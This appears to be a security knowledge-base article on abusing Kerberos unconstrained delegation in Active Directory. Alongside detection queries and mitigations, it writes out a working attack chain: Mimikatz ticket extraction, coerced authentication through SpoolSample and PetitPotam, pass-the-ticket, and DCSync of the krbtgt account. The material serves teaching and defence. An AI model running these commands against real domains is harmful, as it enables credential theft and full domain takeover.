Unconstrained Delegation Abuse
ATT&CK: T1558 — Steal or Forge Kerberos Tickets
Unconstrained delegation is a Kerberos feature that allows a service to impersonate any user to any service in the domain. If a Domain Admin authenticates to a machine with unconstrained delegation enabled, their TGT is deposited in that machine's memory — and an attacker with local admin on that machine can extract it.
What Delegation Is
Kerberos delegation solves a double-hop problem: User authenticates to Web Server A, which needs to query Database B on the user's behalf. Delegation allows A to impersonate the user to B.
| Delegation Type | What It Allows | Risk Level |
|---|---|---|
| Unconstrained | Impersonate user to ANY service in domain | Critical |
| Constrained | Impersonate user to specific allowed services | Moderate |
| Resource-based Constrained (RBCD) | Configured on resource (not service account) | Lower |
How Unconstrained Delegation Works
- User requests a TGS for the service with unconstrained delegation
- KDC embeds a copy of the user's TGT in the TGS response (forwardable TGT)
- Service extracts the TGT and can now request tickets on behalf of the user to any service
- The TGT is cached in
lsass.exeon the delegation server
An attacker with admin access to the delegation server can extract these cached TGTs via Mimikatz and reuse them.
Finding Unconstrained Delegation Servers
# PowerView
Get-DomainComputer -Unconstrained -Properties DNSHostName,OperatingSystem,ms-Mcs-AdmPwd
# LDAP filter
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,ServicePrincipalName
# BloodHound
# Relationship: HAS_UNCONSTRAINED_DELEGATION
# Node property: unconstraineddelegation=true
Domain Controllers have unconstrained delegation by default — this is expected and not a finding. The finding is non-DC computers with unconstrained delegation.
Exploitation
Step 1: Extract Cached TGTs
# On the unconstrained delegation server (as local admin or SYSTEM)
mimikatz # sekurlsa::tickets /export
# Export all tickets; look for .kirbi files for high-value users
# Directory listing will show:
# [0;12345]-2-1-40e00000-Administrator@krbtgt-DOMAIN.COM.kirbi
Step 2: Wait or Coerce Authentication
If no high-value users have recently authenticated, trigger authentication using the Printer Bug (MS-RPRN) or PetitPotam (EfsRpc):
# Printer Bug - coerce DC$ to authenticate to the delegation server
# SpoolSample.exe <DC-hostname> <DelegationServer-hostname>
.\SpoolSample.exe DC01.domain.com DELEGSERVER01.domain.com
# PetitPotam
python3 PetitPotam.py -u user -p pass <DelegationServer-IP> <DC-IP>
When DC01's machine account authenticates to DELEGSERVER01, its TGT is deposited in memory.
Step 3: Pass the Ticket to Achieve DA
# Import the extracted Domain Controller TGT
mimikatz # kerberos::ptt C:\<path>\DC01$@krbtgt-DOMAIN.COM.kirbi
# Now perform DCSync as the DC machine account
mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt
Impact: From Unconstrained Delegation to Domain Compromise
Unconstrained Delegation Server
→ Coerce DC authentication (Printer Bug / PetitPotam)
→ DC$ TGT deposited in memory
→ Extract TGT
→ Impersonate DC → DCSync
→ Extract krbtgt hash
→ Golden Ticket
This is one of the most reliable paths to domain compromise from a non-DA foothold with local admin on a delegation server.
Real-World Context
Print servers, web application servers, and legacy application servers are commonly configured with unconstrained delegation — often as a workaround for applications that needed multi-hop authentication and were configured before constrained delegation was understood.
Attack tooling (Impacket, Rubeus) has automated this attack chain. It is a standard escalation path in penetration tests and has been observed in real-world intrusions.
Detection
Event IDs
| Event | Log | Signal |
|---|---|---|
| 4769 | Security | TGS request with forwarded TGT option (forwardable bit set) |
| 4768 | Security | TGT request for high-value accounts from unexpected sources |
| 4648 | Security | Logon using explicit credentials (coerced auth) |
Key Detection Logic
// KQL - Entra/Sentinel - Kerberos with forwardable TGT requests to non-DC hosts
SecurityEvent
| where EventID == 4769
| where TicketOptions has "0x40800000" // forwardable + renewable
| where not(TargetUserName endswith "$") // non-machine-account target
| summarize count() by ServiceName, IpAddress
| where ServiceName !contains "DC"
BloodHound Detection
Run BloodHound regularly to find:
HAVE_UNCONSTRAINED_DELEGATION→ machines outside DC tier- Attack paths from those machines to Domain Admins
Mitigation
| Control | Mechanism |
|---|---|
| Remove unconstrained delegation | Set msDS-AllowedToDelegateTo correctly; use constrained delegation |
| Mark sensitive accounts as "Account is sensitive and cannot be delegated" | Prevents TGT forwarding for those accounts |
| Protected Users group | Members' TGTs cannot be forwarded (delegation blocked) |
| Disable Spooler service on DCs | Removes Printer Bug attack surface |
| Restrict NTLM | Reduces coerced authentication attack paths |
Cross-Links
| Topic | Link |
|---|---|
| Constrained Delegation | constrained-delegation |
| Resource-Based Constrained Delegation | rbcd |
| DCSync | dcsync |
| Pass-the-Ticket | pass-the-ticket |
| Golden Ticket | golden-ticket |